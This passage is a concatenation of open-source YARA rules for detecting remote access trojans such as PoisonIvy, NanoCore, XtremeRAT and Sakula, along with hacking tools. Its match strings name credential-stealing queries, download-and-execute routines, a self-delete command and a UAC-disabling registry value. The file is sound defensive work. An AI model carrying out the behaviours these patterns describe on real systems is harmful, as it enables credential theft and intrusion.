<kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/PoisonIvy" maltype = "Remote Access Trojan" filetype = "exe" strings: $stub = {04 08 00 53 74 75 62 50 61 74 68 18 04} $string1 = "CONNECT %s:%i HTTP/1.0" $string2 = "ws2_32" $string3 = "cks=u" $string4 = "thj@h" $string5 = "advpack" condition: $stub at 0x1620 and all of ($string*) or (all of them) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule AAR : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/AAR" maltype = "Remote Access Trojan" filetype = "exe" strings: $a = "Hashtable" $b = "get_IsDisposed" $c = "TripleDES" $d = "testmemory.FRMMain.resources" $e = "$this.Icon" wide $f = "{11111-22222-20001-00001}" wide $g = "@@@@@" condition: all of them } rule Ap0calypse: RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/Ap0calypse" maltype = "Remote Access Trojan" filetype = "exe" strings: $a = "Ap0calypse" $b = "Sifre" $c = "MsgGoster" $d = "Baslik" $e = "Dosyalars" $f = "Injecsiyon" condition: all of them } rule Arcom : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/Arcom" maltype = "Remote Access Trojan" filetype = "exe" strings: $a1 = "CVu3388fnek3W(3ij3fkp0930di" $a2 = "ZINGAWI2" $a3 = "clWebLightGoldenrodYellow" $a4 = "Ancestor for '%s' not found" wide $a5 = "Control-C hit" wide $a6 = {A3 24 25 21} condition: all of them } rule Bandook : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/bandook" maltype = "Remote Access Trojan" filetype = "exe" strings: $a = "aaaaaa1|" $b = "aaaaaa2|" $c = "aaaaaa3|" $d = "aaaaaa4|" $e = "aaaaaa5|" $f = "%s%d.exe" $g = "astalavista" $h = "givemecache" $i = "%s\\system32\\drivers\\blogs\\*" $j = "bndk13me" condition: all of them } rule BlackNix : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/BlackNix" maltype = "Remote Access Trojan" filetype = "exe" strings: $a1 = "SETTINGS" wide $a2 = "Mark Adler" $a3 = "Random-Number-Here" $a4 = "RemoteShell" $a5 = "SystemInfo" condition: all of them } rule BlueBanana : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/BlueBanana" maltype = "Remote Access Trojan" filetype = "Java" strings: $meta = "META-INF" $conf = "config.txt" $a = "a/a/a/a/f.class" $b = "a/a/a/a/l.class" $c = "a/a/a/b/q.class" $d = "a/a/a/b/v.class" condition: all of them } rule ClientMesh : RAT { meta: author = "Kevin Breen <kevin@techanarchy.net>" date = "2014/06" ref = "http://malwareconfig.com/stats/ClientMesh" family = "torct" strings: $string1 = "machinedetails" $string2 = "MySettings" $string3 = "sendftppasswords" $string4 = "sendbrowserpasswords" $string5 = "arma2keyMass" $string6 = "keylogger" $conf = {00 00 00 00 00 00 00 00 00 7E} condition: all of them } rule DarkRAT : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/DarkRAT" maltype = "Remote Access Trojan" filetype = "exe" strings: $a = "@1906dark1996coder@" $b = "SHEmptyRecycleBinA" $c = "mciSendStringA" $d = "add_Shutdown" $e = "get_SaveMySettingsOnExit" $f = "get_SpecialDirectories" $g = "Client.My" condition: all of them } rule Greame : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/Greame" maltype = "Remote Access Trojan" filetype = "exe" strings: $a = {23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23} $b = {23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23} $c = "EditSvr" $d = "TLoader" $e = "Stroks" $f = "Avenger by NhT" $g = "####@####" $h = "GREAME" condition: all of them } rule HawkEye : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2015/06" ref = "http://malwareconfig.com/stats/HawkEye" maltype = "KeyLogger" filetype = "exe" strings: $key = "HawkEyeKeylogger" wide $salt = "099u787978786" wide $string1 = "HawkEye_Keylogger" wide $string2 = "holdermail.txt" wide $string3 = "wallet.dat" wide $string4 = "Keylog Records" wide $string5 = "<!-- do not script -->" wide $string6 = "\\pidloc.txt" wide $string7 = "BSPLIT" wide condition: $key and $salt and all of ($string*) } rule Imminent : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/Imminent" maltype = "Remote Access Trojan" filetype = "exe" strings: $v1a = "DecodeProductKey" $v1b = "StartHTTPFlood" $v1c = "CodeKey" $v1d = "MESSAGEBOX" $v1e = "GetFilezillaPasswords" $v1f = "DataIn" $v1g = "UDPzSockets" $v1h = {52 00 54 00 5F 00 52 00 43 00 44 00 41 00 54 00 41} $v2a = "<URL>k__BackingField" $v2b = "<RunHidden>k__BackingField" $v2c = "DownloadAndExecute" $v2d = "-CHECK & PING -n 2 127.0.0.1 & EXIT" wide $v2e = "england.png" wide $v2f = "Showed Messagebox" wide condition: all of ($v1*) or all of ($v2*) } rule Infinity : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/Infinity" maltype = "Remote Access Trojan" filetype = "exe" strings: $a = "CRYPTPROTECT_PROMPTSTRUCT" $b = "discomouse" $c = "GetDeepInfo" $d = "AES_Encrypt" $e = "StartUDPFlood" $f = "BATScripting" wide $g = "FBqINhRdpgnqATxJ.html" wide $i = "magic_key" wide condition: all of them } rule JavaDropper : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2015/10" ref = "http://malwareconfig.com/stats/AlienSpy" maltype = "Remote Access Trojan" filetype = "jar" strings: $jar = "META-INF/MANIFEST.MF" $a1 = "ePK" $a2 = "kPK" $b1 = "config.ini" $b2 = "password.ini" $c1 = "stub/stub.dll" $d1 = "c.dat" condition: $jar and (all of ($a*) or all of ($b*) or all of ($c*) or all of ($d*)) } rule LostDoor : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/LostDoor" maltype = "Remote Access Trojan" filetype = "exe" strings: $a0 = {0D 0A 2A 45 44 49 54 5F 53 45 52 56 45 52 2A 0D 0A} $a1 = "*mlt* = %" $a2 = "*ip* = %" $a3 = "*victimo* = %" $a4 = "*name* = %" $b5 = "[START]" $b6 = "[DATA]" $b7 = "We Control Your Digital World" wide ascii $b8 = "RC4Initialize" wide ascii $b9 = "RC4Decrypt" wide ascii condition: all of ($a*) or all of ($b*) } rule LuminosityLink : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/LuminosityLink" maltype = "Remote Access Trojan" filetype = "exe" strings: $a = "SMARTLOGS" wide $b = "RUNPE" wide $c = "b.Resources" wide $d = "CLIENTINFO*" wide $e = "Invalid Webcam Driver Download URL, or Failed to Download File!" wide $f = "Proactive Anti-Malware has been manually activated!" wide $g = "REMOVEGUARD" wide $h = "C0n1f8" wide $i = "Luminosity" wide $j = "LuminosityCryptoMiner" wide $k = "MANAGER*CLIENTDETAILS*" wide condition: all of them } rule LuxNet : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/LuxNet" maltype = "Remote Access Trojan" filetype = "exe" strings: $a = "GetHashCode" $b = "Activator" $c = "WebClient" $d = "op_Equality" $e = "dickcursor.cur" wide $f = "{0}|{1}|{2}" wide condition: all of them } rule NanoCore : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/NanoCore" maltype = "Remote Access Trojan" filetype = "exe" strings: $a = "NanoCore" $b = "ClientPlugin" $c = "ProjectData" $d = "DESCrypto" $e = "KeepAlive" $f = "IPNETROW" $g = "LogClientMessage" $h = "|ClientHost" $i = "get_Connected" $j = "#=q" $key = {43 6f 24 cb 95 30 38 39} condition: 6 of them } rule Paradox : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/Paradox" maltype = "Remote Access Trojan" filetype = "exe" strings: $a = "ParadoxRAT" $b = "Form1" $c = "StartRMCam" $d = "Flooders" $e = "SlowLaris" $f = "SHITEMID" $g = "set_Remote_Chat" condition: all of them } rule Plasma : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/Plasma" maltype = "Remote Access Trojan" filetype = "exe" strings: $a = "Miner: Failed to Inject." wide $b = "Started GPU Mining on:" wide $c = "BK: Hard Bot Killer Ran Successfully!" wide $d = "Uploaded Keylogs Successfully!" wide $e = "No Slowloris Attack is Running!" wide $f = "An ARME Attack is Already Running on" wide $g = "Proactive Bot Killer Enabled!" wide $h = "PlasmaRAT" wide ascii $i = "AntiEverything" wide ascii condition: all of them } rule PredatorPain : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/PredatorPain" maltype = "Remote Access Trojan" filetype = "exe" strings: $string1 = "holderwb.txt" wide $string3 = "There is a file attached to this email" wide $string4 = "screens\\screenshot" wide $string5 = "Disablelogger" wide $string6 = "\\pidloc.txt" wide $string7 = "clearie" wide $string8 = "clearff" wide $string9 = "emails should be sent to you shortly" wide $string10 = "jagex_cache\\regPin" wide $string11 = "open=Sys.exe" wide $ver1 = "PredatorLogger" wide $ver2 = "EncryptedCredentials" wide $ver3 = "Predator Pain" wide condition: 7 of ($string*) and any of ($ver*) } rule Punisher : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/Punisher" maltype = "Remote Access Trojan" filetype = "exe" strings: $a = "abccba" $b = {5C 00 68 00 66 00 68 00 2E 00 76 00 62 00 73} $c = {5C 00 73 00 63 00 2E 00 76 00 62 00 73} $d = "SpyTheSpy" wide ascii $e = "wireshark" wide $f = "apateDNS" wide $g = "abccbaDanabccb" condition: all of them } rule PythoRAT : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/PythoRAT" maltype = "Remote Access Trojan" filetype = "exe" strings: $a = "TKeylogger" $b = "uFileTransfer" $c = "TTDownload" $d = "SETTINGS" $e = "Unknown" wide $f = "#@#@#" $g = "PluginData" $i = "OnPluginMessage" condition: all of them } rule QRat : RAT { meta: author = "Kevin Breen @KevTheHermit" date = "2015/08" ref = "http://malwareconfig.com" maltype = "Remote Access Trojan" filetype = "jar" strings: $a0 = "e-data" $a1 = "quaverse/crypter" $a2 = "Qrypt.class" $a3 = "Jarizer.class" $a4 = "URLConnection.class" condition: 4 of them } rule SmallNet : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/SmallNet" maltype = "Remote Access Trojan" filetype = "exe" strings: $split1 = "!!<3SAFIA<3!!" $split2 = "!!ElMattadorDz!!" $a1 = "stub_2.Properties" $a2 = "stub.exe" wide $a3 = "get_CurrentDomain" condition: ($split1 or $split2) and (all of ($a*)) } rule SpyGate : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/SpyGate" maltype = "Remote Access Trojan" filetype = "exe" strings: $split = "abccba" $a1 = "abccbaSpyGateRATabccba" //$a = Version 0.2.6 $a2 = "StubX.pdb" $a3 = "abccbaDanabccb" $b1 = "monikerString" nocase //$b = Version 2.0 $b2 = "virustotal1" $b3 = "get_CurrentDomain" $c1 = "shutdowncomputer" wide //$c = Version 2.9 $c2 = "shutdown -r -t 00" wide $c3 = "set cdaudio door closed" wide $c4 = "FileManagerSplit" wide $c5 = "Chating With >> [~Hacker~]" wide condition: (all of ($a*) and #split > 40) or (all of ($b*) and #split > 10) or (all of ($c*)) } rule Sub7Nation : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/Sub7Nation" maltype = "Remote Access Trojan" filetype = "exe" strings: $a = "EnableLUA /t REG_DWORD /d 0 /f" $b = "*A01*" $c = "*A02*" $d = "*A03*" $e = "*A04*" $f = "*A05*" $g = "*A06*" $h = "#@#@#" $i = "HostSettings" $verSpecific1 = "sevane.tmp" $verSpecific2 = "cmd_.bat" $verSpecific3 = "a2b7c3d7e4" $verSpecific4 = "cmd.dll" condition: all of them } rule UPX : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" strings: $a = "UPX0" $b = "UPX1" $c = "UPX!" condition: all of them } rule Vertex : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/Vertex" maltype = "Remote Access Trojan" filetype = "exe" strings: $string1 = "DEFPATH" $string2 = "HKNAME" $string3 = "HPORT" $string4 = "INSTALL" $string5 = "IPATH" $string6 = "MUTEX" $res1 = "PANELPATH" $res2 = "ROOTURL" condition: all of them } rule VirusRat : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/VirusRat" maltype = "Remote Access Trojan" filetype = "exe" strings: $string0 = "virustotal" $string1 = "virusscan" $string2 = "abccba" $string3 = "pronoip" $string4 = "streamWebcam" $string5 = "DOMAIN_PASSWORD" $string6 = "Stub.Form1.resources" $string7 = "ftp://{0}@{1}" wide $string8 = "SELECT * FROM moz_logins" wide $string9 = "SELECT * FROM moz_disabledHosts" wide $string10 = "DynDNS\\Updater\\config.dyndns" wide $string11 = "|BawaneH|" wide condition: all of them } rule unrecom : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/AAR" maltype = "Remote Access Trojan" filetype = "exe" strings: $meta = "META-INF" $conf = "load/ID" $a = "load/JarMain.class" $b = "load/MANIFEST.MF" $c = "plugins/UnrecomServer.class" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule sakula_v1_0: RAT { meta: description = "Sakula v1.0" date = "2015-10-13" author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou" strings: $m1 = "%d_of_%d_for_%s_on_%s" $m2 = "/c ping 127.0.0.1 & del /q \"%s\"" $m3 = "=%s&type=%d" $m4 = "?photoid=" $m5 = "iexplorer" $m6 = "net start \"%s\"" $v1_1 = "MicroPlayerUpdate.exe" $MZ = "MZ" condition: $MZ at 0 and all of ($m*) and not $v1_1 } rule sakula_v1_1: RAT { meta: description = "Sakula v1.1" date = "2015-10-13" author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou" strings: $m1 = "%d_of_%d_for_%s_on_%s" $m2 = "/c ping 127.0.0.1 & del /q \"%s\"" $m3 = "=%s&type=%d" $m4 = "?photoid=" $m5 = "iexplorer" $m6 = "net start \"%s\"" $v1_1 = "MicroPlayerUpdate.exe" $MZ = "MZ" condition: $MZ at 0 and all of them } rule sakula_v1_2: RAT { meta: description = "Sakula v1.2" date = "2015-10-13" author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou" strings: $m1 = "%d_of_%d_for_%s_on_%s" $m2 = "/c ping 127.0.0.1 & del /q \"%s\"" $m3 = "cmd.exe /c rundll32 \"%s\"" $v1_1 = "MicroPlayerUpdate.exe" $v1_2 = "CCPUpdate" $MZ = "MZ" condition: $MZ at 0 and $m1 and $m2 and $m3 and $v1_2 and not $v1_1 } rule sakula_v1_3: RAT { meta: description = "Sakula v1.3" date = "2015-10-13" author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou" strings: $m1 = "%d_of_%d_for_%s_on_%s" $m2 = "/c ping 127.0.0.1 & del /q \"%s\"" $m3 = "cmd.exe /c rundll32 \"%s\"" $v1_3 = { 81 3E 78 03 00 00 75 57 8D 54 24 14 52 68 0C 05 41 00 68 01 00 00 80 FF 15 00 F0 40 00 85 C0 74 10 8B 44 24 14 68 2C 31 41 00 50 FF 15 10 F0 40 00 8B 4C 24 14 51 FF 15 24 F0 40 00 E8 0F 09 00 } $MZ = "MZ" condition: $MZ at 0 and all of them } rule sakula_v1_4: RAT { meta: description = "Sakula v1.4" date = "2015-10-13" author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou" strings: $m1 = "%d_of_%d_for_%s_on_%s" $m2 = "/c ping 127.0.0.1 & del /q \"%s\"" $m3 = "cmd.exe /c rundll32 \"%s\"" $v1_4 = { 50 E8 CD FC FF FF 83 C4 04 68 E8 03 00 00 FF D7 56 E8 54 12 00 00 E9 AE FE FF FF E8 13 F5 FF FF } $MZ = "MZ" condition: $MZ at 0 and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule ShadowTech_2 { meta: description = "ShadowTech RAT" author = "botherder https://github.com/botherder" strings: $string1 = /\#(S)trings/ $string2 = /\#(G)UID/ $string3 = /\#(B)lob/ $string4 = /(S)hadowTech Rat\.exe/ $string5 = /(S)hadowTech_Rat/ condition: all of them } rule ShadowTech { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/ShadowTech" maltype = "Remote Access Trojan" filetype = "exe" strings: $a = "ShadowTech" nocase $b = "DownloadContainer" $c = "MySettings" $d = "System.Configuration" $newline = "#-@NewLine@-#" wide $split = "pSIL" wide $key = "ESIL" wide condition: 4 of them } rule shimrat: RAT { meta: description = "Detects ShimRat and the ShimRat loader" author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)" date = "20/11/2015" ref = "https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/" strings: $dll = ".dll" $dat = ".dat" $headersig = "QWERTYUIOPLKJHG" $datasig = "MNBVCXZLKJHGFDS" $datamarker1 = "Data$$00" $datamarker2 = "Data$$01%c%sData" $cmdlineformat = "ping localhost -n 9 /c %s > nul" $demoproject_keyword1 = "Demo" $demoproject_keyword2 = "Win32App" $comspec = "COMSPEC" $shim_func1 = "ShimMain" $shim_func2 = "NotifyShims" $shim_func3 = "GetHookAPIs" condition: ($dll and $dat and $headersig and $datasig) or ($datamarker1 and $datamarker2) or ($cmdlineformat and $demoproject_keyword1 and $demoproject_keyword2 and $comspec) or ($dll and $dat and $shim_func1 and $shim_func2 and $shim_func3) } rule shimratreporter: RAT { meta: description = "Detects ShimRatReporter" author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)" date = "20/11/2015" ref = "https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/" strings: $IpInfo = "IP-INFO" $NetworkInfo = "Network-INFO" $OsInfo = "OS-INFO" $ProcessInfo = "Process-INFO" $BrowserInfo = "Browser-INFO" $QueryUserInfo = "QueryUser-INFO" $UsersInfo = "Users-INFO" $SoftwareInfo = "Software-INFO" $AddressFormat = "%02X-%02X-%02X-%02X-%02X-%02X" $proxy_str = "(from environment) = %s" $netuserfun = "NetUserEnum" $networkparams = "GetNetworkParams" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule TerminatorRat : RAT { meta: description = "Terminator RAT" author = "Jean-Philippe Teissier / @Jipe_" date = "2013-10-24" filetype = "memory" version = "1.0" ref1 = "http://www.fireeye.com/blog/technical/malware-research/2013/10/evasive-tactics-terminator-rat.html" strings: $a = "Accelorator" $b = "<html><title>12356</title><body>" condition: all of them } rule TROJAN_Notepad_shell_crew : Trojan { meta: author = "RSA_IR" Date = "4Jun13" File = "notepad.exe v 1.1" MD5 = "106E63DBDA3A76BEEB53A8BBD8F98927" strings: $s1 = "75BAA77C842BE168B0F66C42C7885997" $s2 = "B523F63566F407F3834BCC54AAA32524" condition: $s1 or $s2 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Xtreme { meta: description = "Xtreme RAT" author = "botherder https://github.com/botherder" strings: $string1 = /(X)tremeKeylogger/ wide ascii $string2 = /(X)tremeRAT/ wide ascii $string3 = /(X)TREMEUPDATE/ wide ascii $string4 = /(S)TUBXTREMEINJECTED/ wide ascii $unit1 = /(U)nitConfigs/ wide ascii $unit2 = /(U)nitGetServer/ wide ascii $unit3 = /(U)nitKeylogger/ wide ascii $unit4 = /(U)nitCryptString/ wide ascii $unit5 = /(U)nitInstallServer/ wide ascii $unit6 = /(U)nitInjectServer/ wide ascii $unit7 = /(U)nitBinder/ wide ascii $unit8 = /(U)nitInjectProcess/ wide ascii condition: 5 of them } rule xtreme_rat : Trojan { meta: author="Kevin Falcoz" date="23/02/2013" description="Xtreme RAT" strings: $signature1={58 00 54 00 52 00 45 00 4D 00 45} /*X.T.R.E.M.E*/ condition: $signature1 } rule XtremeRATCode : XtremeRAT Family { meta: description = "XtremeRAT code features" author = "Seth Hardy" last_modified = "2014-07-09" strings: // call; fstp st $ = { E8 ?? ?? ?? ?? DD D8 } // hiding string $ = { C6 85 ?? ?? ?? ?? 4D C6 85 ?? ?? ?? ?? 70 C6 85 ?? ?? ?? ?? 64 C6 85 ?? ?? ?? ?? 62 C6 85 ?? ?? ?? ?? 6D } condition: all of them } rule XtremeRATStrings : XtremeRAT Family { meta: description = "XtremeRAT Identifying Strings" author = "Seth Hardy" last_modified = "2014-07-09" strings: $ = "dqsaazere" $ = "-GCCLIBCYGMING-EH-TDM1-SJLJ-GTHR-MINGW32" condition: all of them } rule XtremeRAT : Family { meta: description = "XtremeRAT" author = "Seth Hardy" last_modified = "2014-07-09" condition: XtremeRATCode or XtremeRATStrings } rule xtremrat : rat { meta: author = "Jean-Philippe Teissier / @Jipe_" description = "Xtrem RAT v3.5" date = "2012-07-12" version = "1.0" filetype = "memory" strings: $a = "XTREME" wide $b = "XTREMEBINDER" wide $c = "STARTSERVERBUFFER" wide $d = "SOFTWARE\\XtremeRAT" wide $e = "XTREMEUPDATE" wide $f = "XtremeKeylogger" wide $g = "myversion|3.5" wide $h = "xtreme rat" wide nocase condition: 2 of them } rule xtreme_rat_0 { meta: maltype = "Xtreme RAT" reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/xtreme-rat-targets-israeli-government/" strings: $type="Microsoft-Windows-Security-Auditing" $eventid="5156" $data="windows\\system32\\sethc.exe" $type1="Microsoft-Windows-Security-Auditing" $eventid1="4688" $data1="AppData\\Local\\Temp\\Microsoft Word.exe" condition: all of them } rule xtreme_rat_1 { meta: maltype = "Xtreme RAT" ref = "https://github.com/reed1713" reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/xtreme-rat-targets-israeli-government/" strings: $type="Microsoft-Windows-Security-Auditing" $eventid="5156" $data="windows\\system32\\sethc.exe" $type1="Microsoft-Windows-Security-Auditing" $eventid1="4688" $data1="AppData\\Local\\Temp\\Microsoft Word.exe" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule zoxPNG_RAT { meta: Author = "Novetta Advanced Research Group" Date = "2014/11/14" Description = "ZoxPNG RAT, url inside" Reference = "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf" strings: $url = "png&w=800&h=600&ei=CnJcUcSBL4rFkQX444HYCw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty=58" condition: $url } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule jRAT_conf : RAT { meta: description = "jRAT configuration" author = "Jean-Philippe Teissier / @Jipe_" date = "2013-10-11" filetype = "memory" version = "1.0" ref1 = "https://github.com/MalwareLu/config_extractor/blob/master/config_jRAT.py" ref2 = "http://www.ghettoforensics.com/2013/10/dumping-malware-configuration-data-from.html" strings: $a = /port=[0-9]{1,5}SPLIT/ condition: $a } rule xRAT : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/xRat" maltype = "Remote Access Trojan" filetype = "exe" strings: $v1a = "DecodeProductKey" $v1b = "StartHTTPFlood" $v1c = "CodeKey" $v1d = "MESSAGEBOX" $v1e = "GetFilezillaPasswords" $v1f = "DataIn" $v1g = "UDPzSockets" $v1h = {52 00 54 00 5F 00 52 00 43 00 44 00 41 00 54 00 41} $v2a = "<URL>k__BackingField" $v2b = "<RunHidden>k__BackingField" $v2c = "DownloadAndExecute" $v2d = "-CHECK & PING -n 2 127.0.0.1 & EXIT" wide $v2e = "england.png" wide $v2f = "Showed Messagebox" wide condition: all of ($v1*) or all of ($v2*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule xRAT20 : RAT { meta: author = "Rottweiler" date = "2015-08-20" description = "Identifies xRAT 2.0 samples" maltype = "Remote Access Trojan" hash0 = "cda610f9cba6b6242ebce9f31faf5d9c" hash1 = "60d7b0d2dfe937ac6478807aa7043525" hash2 = "d1b577fbfd25cc5b873b202cfe61b5b8" hash3 = "1820fa722906569e3f209d1dab3d1360" hash4 = "8993b85f5c138b0afacc3ff04a2d7871" hash5 = "0c231ed8a800b0f17f897241f1d5f4e3" hash1 = "60d7b0d2dfe937ac6478807aa7043525" hash8 = "2c198e3e0e299a51e5d955bb83c62a5e" sample_filetype = "exe" yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator" strings: $string0 = "GetDirectory: File not found" wide $string1 = "<>m__Finally8" $string2 = "Secure" $string3 = "ReverseProxyClient" $string4 = "DriveDisplayName" $string5 = "<IsError>k__BackingField" $string6 = "set_InstallPath" $string7 = "memcmp" $string8 = "urlHistory" $string9 = "set_AllowAutoRedirect" $string10 = "lpInitData" $string11 = "reader" $string12 = "<FromRawDataGlobal>d__f" $string13 = "mq.png" wide $string14 = "remove_KeyDown" $string15 = "ProtectedData" $string16 = "m_hotkeys" $string17 = "get_Hour" $string18 = "\\mozglue.dll" wide condition: 18 of them } rule mswin_check_lm_group { meta: description = "Chinese Hacktool Set - file mswin_check_lm_group.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "115d87d7e7a3d08802a9e5fd6cd08e2ec633c367" strings: $s1 = "Valid_Global_Groups: checking group membership of '%s\\%s'." fullword ascii $s2 = "Usage: %s [-D domain][-G][-P][-c][-d][-h]" fullword ascii $s3 = "-D default user Domain" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 380KB and all of them } rule WAF_Bypass { meta: description = "Chinese Hacktool Set - file WAF-Bypass.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "860a9d7aac2ce3a40ac54a4a0bd442c6b945fa4e" strings: $s1 = "Email: blacksplitn@gmail.com" fullword wide $s2 = "User-Agent:" fullword wide $s3 = "Send Failed.in RemoteThread" fullword ascii $s4 = "www.example.com" fullword wide $s5 = "Get Domain:%s IP Failed." fullword ascii $s6 = "Connect To Server Failed." fullword ascii condition: uint16(0) == 0x5a4d and filesize < 7992KB and 5 of them } rule Guilin_veterans_cookie_spoofing_tool { meta: description = "Chinese Hacktool Set - file Guilin veterans cookie spoofing tool.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "06b1969bc35b2ee8d66f7ce8a2120d3016a00bb1" strings: $s0 = "kernel32.dll^G" fullword ascii $s1 = "\\.Sus\"B" fullword ascii $s4 = "u56Load3" fullword ascii $s11 = "O MYTMP(iM) VALUES (" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1387KB and all of them } rule MarathonTool { meta: description = "Chinese Hacktool Set - file MarathonTool.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "084a27cd3404554cc799d0e689f65880e10b59e3" strings: $s0 = "MarathonTool" ascii $s17 = "/Blind SQL injection tool based in heavy queries" fullword ascii $s18 = "SELECT UNICODE(SUBSTRING((system_user),{0},1))" fullword wide condition: uint16(0) == 0x5a4d and filesize < 1040KB and all of them } rule PLUGIN_TracKid { meta: description = "Chinese Hacktool Set - file TracKid.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "a114181b334e850d4b33e9be2794f5bb0eb59a09" strings: $s0 = "E-mail: cracker_prince@163.com" fullword ascii $s1 = ".\\TracKid Log\\%s.txt" fullword ascii $s2 = "Coded by prince" fullword ascii $s3 = "TracKid.dll" fullword ascii $s4 = ".\\TracKid Log" fullword ascii $s5 = "%08x -- %s" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 200KB and 3 of them } rule Pc_pc2015 { meta: description = "Chinese Hacktool Set - file pc2015.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "de4f098611ac9eece91b079050b2d0b23afe0bcb" strings: $s0 = "\\svchost.exe" fullword ascii $s1 = "LON\\OD\\O-\\O)\\O%\\O!\\O=\\O9\\O5\\O1\\O" fullword ascii $s8 = "%s%08x.001" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 309KB and all of them } rule sekurlsa { meta: description = 